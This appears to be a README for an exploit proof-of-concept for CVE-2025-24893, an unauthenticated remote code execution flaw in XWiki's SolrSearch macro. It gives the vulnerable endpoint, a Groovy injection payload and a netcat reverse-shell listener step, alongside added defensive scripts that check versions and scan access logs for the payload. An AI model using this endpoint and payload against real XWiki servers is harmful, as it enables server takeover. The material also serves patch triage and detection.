CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC
CVE-2025-24893 is a critical unauthenticated remote code execution vulnerability in XWiki (all versions before the fixed releases 15.10.11, 16.4.1 and 16.5.0RC1), caused by improper handling of Groovy expressions in the SolrSearch macro.
Summary
CVE-2025-24893 is a critical RCE vulnerability in XWiki, caused by unsafe Groovy expression handling inside the SolrSearch macro. An attacker can inject Groovy code through a crafted GET request, leading to remote code execution with no authentication required.
- Severity: Critical (CVSS 9.8)
- Affected: all versions before the fixed releases 15.10.11, 16.4.1 and 16.5.0RC1
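A version triage helper for the affected ranges listed above, added here as an example (it is not part of this repository's exploit script). It assumes XWiki version strings of the form `MAJOR.MINOR.PATCH` with an optional `RC<n>` or `milestone-<n>` qualifier, treats every release before 15.10.11 (including the 14.x line) as affected because the page gives no lower bound, and treats 16.5.0 pre-releases older than RC1 as affected because the fix is stated to land in RC1; that last point is an assumption.

```python
import re

# MAJOR.MINOR.PATCH with an optional pre-release qualifier such as
# "16.5.0RC1" or "16.5.0-milestone-2" (format assumption).
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-?(rc|m|milestone)-?(\d+))?$", re.IGNORECASE)

# Fixed releases named in the advisory summary on this page.
FIXED_15 = "15.10.11"
FIXED_16 = "16.4.1"
FIXED_16_5 = "16.5.0RC1"


def parse_version(text):
    """Turn an XWiki version string into a comparable tuple.

    Pre-release qualifiers sort before the final release:
    milestone (rank 0) < RC (rank 1) < final (rank 2).
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised XWiki version: {text!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    qualifier, number = m.group(4), m.group(5)
    if qualifier is None:
        rank = (2, 0)
    elif qualifier.lower() == "rc":
        rank = (1, int(number))
    else:  # "m" / "milestone"
        rank = (0, int(number))
    return (major, minor, patch, rank)


def is_affected(version):
    """Return True if the given XWiki version falls inside the vulnerable ranges."""
    v = parse_version(version)
    major, minor, patch = v[0], v[1], v[2]
    if major < 15:
        # No fixed release below 15.10.11 is listed, so older lines count as affected.
        return True
    if major == 15:
        return v < parse_version(FIXED_15)
    if major == 16:
        if v < parse_version(FIXED_16):
            return True
        # 16.5.0 builds earlier than RC1 (assumption: milestones) are still affected.
        return (major, minor, patch) == (16, 5, 0) and v < parse_version(FIXED_16_5)
    return False


if __name__ == "__main__":
    for candidate in ("15.10.8", "15.10.11", "16.4.0", "16.4.1", "16.5.0-milestone-2", "16.5.0RC1", "16.6.0"):
        print(f"{candidate:>20}: {'AFFECTED' if is_affected(candidate) else 'fixed'}")
```

The version used in the PoC section of this page, 15.10.8, reports as affected; every fixed release listed above reports as fixed.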
Technical Breakdown
The vulnerability resides in the SolrSearch macro (Main.SolrSearch) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for arbitrary code execution.
Vulnerable Endpoint
```
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
```
An attacker can inject Groovy code into the text parameter, which is evaluated server-side due to improper input handling within the macro system.
Example Payload
```
}}}'id'.execute()
```
This leads to unauthenticated Remote Code Execution (RCE) on vulnerable XWiki instances.
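For defenders, the endpoint and payload shape above are enough to hunt for exploitation attempts in web server access logs. The following detector is an added example and not part of this repository; it assumes combined-format access logs (Apache/nginx style), matches only the stable tail of the SolrSearch path because the `/xwiki` context root differs between deployments, and flags requests whose decoded `text` parameter carries the `}}}` break-out or a Groovy `.execute(` call seen in the payload above (the `{{groovy` macro syntax is included as a third marker). The sample log lines are constructed, not real traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Stable tail of the endpoint named on the page; the "/xwiki" context root
# varies per deployment (assumption), so it is not part of the match.
SOLR_SEARCH_PATH = re.compile(r"/bin/get/Main/SolrSearch/?$", re.IGNORECASE)

# Markers derived from the page's payload }}}'id'.execute(): a wiki-syntax
# break-out followed by Groovy's String.execute(). {{groovy is XWiki's own
# Groovy macro syntax and is checked for the same reason.
GROOVY_MARKERS = {
    "brace_breakout": re.compile(r"\}\}\}"),
    "groovy_execute": re.compile(r"\.execute\s*\(", re.IGNORECASE),
    "groovy_macro": re.compile(r"\{\{\s*groovy", re.IGNORECASE),
}

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def inspect_line(line):
    """Return a finding dict for a SolrSearch request carrying Groovy markers, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not SOLR_SEARCH_PATH.search(parts.path):
        return None
    # parse_qs percent-decodes and turns '+' into spaces, so differently encoded
    # copies of the same payload are inspected in one normalised form.
    params = parse_qs(parts.query, keep_blank_values=True)
    text = " ".join(params.get("text", []))
    hits = sorted(name for name, rx in GROOVY_MARKERS.items() if rx.search(text))
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "decoded_text": text,
        "markers": hits,
    }


def scan_log(lines):
    """Run inspect_line over an iterable of log lines and collect the findings."""
    return [f for f in (inspect_line(line) for line in lines) if f]


# Constructed sample log (not real traffic): a benign search, a request shaped like
# the page's example payload, the same payload with '+'-encoded spaces, and an
# unrelated page view that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Mar/2025:12:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 4821',
    '198.51.100.7 - - [10/Mar/2025:12:00:05 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%27id%27.execute%28%29 HTTP/1.1" 200 903',
    '198.51.100.7 - - [10/Mar/2025:12:00:09 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D+%27id%27.execute+%28%29 HTTP/1.1" 200 905',
    '203.0.113.10 - - [10/Mar/2025:12:00:12 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 15320',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['timestamp']} {finding['ip']} status={finding['status']} "
              f"markers={finding['markers']} text={finding['decoded_text']!r}")
```

Because the vulnerable path is reached with a plain GET, a 200 response to a flagged request is the signal to prioritise; feeding the same regexes into a WAF or SIEM rule on the decoded query string gives the equivalent real-time check.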
Proof-of-Concept (PoC) Demonstration
Target Environment
The vulnerable target is an XWiki instance running version 15.10.8, which is affected by CVE-2025-24893.
Preparing the Listener
Start a Netcat listener on the attacker's machine to capture the reverse shell connection:
```
nc -lvnp 1337
```
Launching the Exploit
Run the exploit script CVE-2025-24893-dbs.py to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.
Successful Remote Shell Access
Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.
References
- OffSec Blog: CVE-2025-24893 XWiki Groovy RCE
- NVD Entry: CVE-2025-24893